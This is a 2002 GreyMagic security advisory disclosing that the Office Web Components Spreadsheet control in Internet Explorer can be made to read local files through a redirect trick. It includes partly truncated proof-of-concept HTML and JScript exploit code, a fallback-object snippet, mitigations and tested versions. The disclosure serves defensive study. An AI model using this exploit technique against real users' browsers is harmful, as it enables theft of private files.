Reading local files with OWC in IE (GM#006-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 04/08/02

Date:         Mon, 8 Apr 2002 17:19:14 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>

GreyMagic Security Advisory GM#006-IE

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at

Topic: Reading local files with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:

* Office 2000 - Office Web Components 9, Spreadsheet component.
* Office XP - Office Web Components 10, Spreadsheet component.


Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.


Using the Spreadsheet component in both OWC9 and OWC10, it is possible to
read any local or remote file.

The "LoadText" method of the Range object takes a URL as its first argument;
it throws an error if the URL supplied is not in the same domain as the
current document.

However, this protection can be easily bypassed by supplying a URL that will
redirect to the desired local or remote file.

OWC is fooled to think that the URL is safe and loads the contents of the
file into the spreadsheet; it is then trivial to retrieve the content and
transfer it to the server or use it in malicious ways.


This example reads the contents of the file "c:/test.txt", the URL
"getFile.asp" is redirecting to "file://c:/test.txt", allowing us to access

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
<script language="jscript">
onload=function () {
    try {
        // Load file into spreadsheet

        // Read the spreadsheet
        var oRng=oSP.ActiveSheet.UsedRange,

        for (var iCRow=1;iCRow<=iRows;iCRow++) {
            for (var iCCol=1;iCCol<=iCols;iCCol++) {
                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";

        // Display result
    catch (oErr) {
        // Failed
        alert("File not found.");

The class id of the <object> element above is for the spreadsheet component
of OWC9 (Microsoft Office 2000), OWC10's class id is
"0002E551-0000-0000-C000-000000000046", no further changes in code are

An attacker can actually use the fallback feature of the <object> element to
include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
        <!-- None found -->
        Failed to load any of the spreadsheet components.


Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed, they have opened an investigation regarding
this issue.

Tested on:

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.


A fully dynamic proof-of-concept demonstration of this issue is available at


Please mail any questions or comments to

- Copyright 2002 GreyMagic Software.